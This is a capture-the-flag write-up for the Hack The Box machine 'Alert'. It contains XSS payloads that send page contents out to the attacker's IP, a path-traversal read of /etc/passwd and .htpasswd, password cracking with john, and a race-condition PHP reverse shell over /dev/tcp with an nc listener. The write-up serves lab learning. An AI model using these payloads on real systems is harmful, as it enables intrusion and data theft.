Alert (HTB)
Intro
Hello my hackers fellow i wish everyone is doing great. Today we have a new hack the box machine called alert, Without further to do let's get right into it.
Enumeration.
Port scanning.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDSrBVJEKTgtUohrzoK9i67CgzqLAxnhEsPmW8hS5CFFGYikUduAcNkKsmmgQI09Q+6pa+7YHsnxcerBnW0taI//IYB5TI/LSE3yUxyk/ROkKLXPNiNGUhC6QiCj3ZTvThyHrFD9ZTxWfZKEQTcOiPs15+HRPCZepPouRtREGwmJcvDal1ix8p/2/C8X57ekouEEpIk1wzDTG5AM2/D08gXXe0TP+KYEaZEzAKM/mQUAqNTxfjc9x5rlfPYW+50kTDwtyKta57tBkkRCnnns0YRnPNtt0AH374ZkYLcqpzxwN8iTNXaeVT/dGfF4mA1uW89hSMarmiRgRh20Y1KIaInHjv9YcvSlbWz+2sz3ev725d4IExQTvDR4sfUAdysIX/q1iNpleyRgM4cvDMjxD6lEKpvQYSWVlRoJwbUUnJqnmZXboRwzRl+V3XCUaABJrA/1K1gvJfsPcU5LX303CV6LDwvLJIcgXlEbtjhkcxz7b7CS78BEW9hPifCUDGKfUs=
| 256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHYLF+puo27gFRX69GBeZJqCeHN3ps2BScsUhKoDV66yEPMOo/Sn588F/wqBnJxsPB3KSFH+kbYW2M6erFI3U5k=
| 256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG/QUl3gapBOWCGEHplsOKe2NlWjlrb5vTTLjg6gMuGl
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-title: Alert - Markdown Viewer
|_Requested resource was index.php?page=alert
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).Classic HTTP, SSH type of machines let's see what our web page looks like.
Enumerate HTTP.
when i first get into the machine i did not know what the web is about so i check the about us page.
And i notice this.
meaning any feedback we send the administartor will check it so am thinking of blind XSS. Let's test that out.
i make a simple payload to fetch some image from my machine.
after setting the python server using.
python3 -m http.server <PORT_NUMBER>
so it indeed vulnraible to blind XSS.
More inverstigation on XSS.
So after i discover that i look more into the markdown files and i found a useful blog.
which prove me something. Look at this.
<h1>Hello World</h1>
<img src="" onerror="fetch('/messages').then(response => response.text()).then(data => { new Image().src='http://10.10.16.20:8000/log.php?output=' + encodeURIComponent(data); })" />I have this markdown files which has a malicious image init which attempt to view the content of the /messages in the web page which we are not authorized to view.
so i will try to use the visualizer to view that content of that path and if its not working i will try with the administrator xss.
so if we upload the file to the visualizer we still forbidden. Now let's test via the feedback.
i used this payload in both examples.
<img src="" onerror="fetch('/messages').then(response => response.text()).then(data => { new Image().src='http://10.10.16.20:8000/log.php?output=' + encodeURIComponent(data); })" />
and as you can see if we use it via the feedback we do not get forbidden so i think this is our way in. But am not sure what to do next let's dig more.
Shell as Albert.
I figure it out MAN.
So am not sure if i mention that but we are able to execute js code in the upload md file it also allow XSS so we upload the following payload.
<script>
fetch("http://alert.htb/messages.php")
.then(response => response.text())
.then(data => {
fetch("http://10.10.16.4:8000/?file_content=" + encodeURIComponent(data));
});
</script>Take this payload upload it into the server and then get the share link on the buttom right corner. After you do so head back to the Contact us page and do the following.
<img src="YOUR SHARED URL" />Put your link there and do not forgot to set you server using python.
by doing so you will recive a URL encoding data like so.
Decoding this URL encoding will show us something important you can use any website i love to use burpsuite.
as you can see we have an optional GET perameter file. Let's see what we can do with that.
<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../../../../../../../../../../../etc/passwd")
.then(response => response.text())
.then(data => {
fetch("http://10.10.16.4:8000/?file_content=" + encodeURIComponent(data));
});
</script>by adding the file prameter i was able to exploit path traversal in the same way.
Great Now we have path traversal in our hand we can maybe use this to access some ssh key ?. But no luck.
So i tried to find anything else and i found this.
we have a subdomain !!!.
So it require creds let's see if we can use the path traversal to find the creds.
With a simple search we can find that apach uses known file for the virtual hosts.
/etc/apache2/sites-enabled/000-default.confLet's see what we have there.
I also attempt to get the config file but there was nothing really.
And indeed it was there.
it appear that it uses the .htpasswd which should include the creds we looking for.
Using the same payload we can get the content of that file which is a hash.
Its time to crack what tool better that THE GOAT john.
john --wordlist=../../Downloads/rockyou.txt --format=md5crypt-long hash
YEAH BABY.
Now we do not care about the other virtual host we can use these creds to login via ssh.
ssh albert@alert.htb
Shell as Root.
So the root process was very simple
First we check our premissions we have not root access
BUUUUUT using the id command we can see that we have another group we are part of.
Using find command we can find the files that belongs to this group.
At first i take a look for the process and i found that the root user it responsible for running this monitor website. specifically the configuration file.
So i tried to modify it but eveytime i do so i found that it returns to its original data by default so i investigated why is that the case ????.
So i thought that there maybe something about this which is cause the file to returns to its default content.
this first idea came to my mind is Race Condition which mean i will setup a while loop which keep write to that file a reverse shell for PHP and hopefully i will be able to get the root user to execute the file when my reverse shell in it.
which was correct.
while true; do echo "<?php define('PATH', '/opt/website-monitor'); exec('/bin/bash -c \'bash -i >& /dev/tcp/10.10.16.38/4444 0>&1\''); ?>" > configuration.php; donei used this command in the terminal and i also setup a NC listener on port 4444 as the payload.
nc -nlvp 4444 and we get it.
Last updated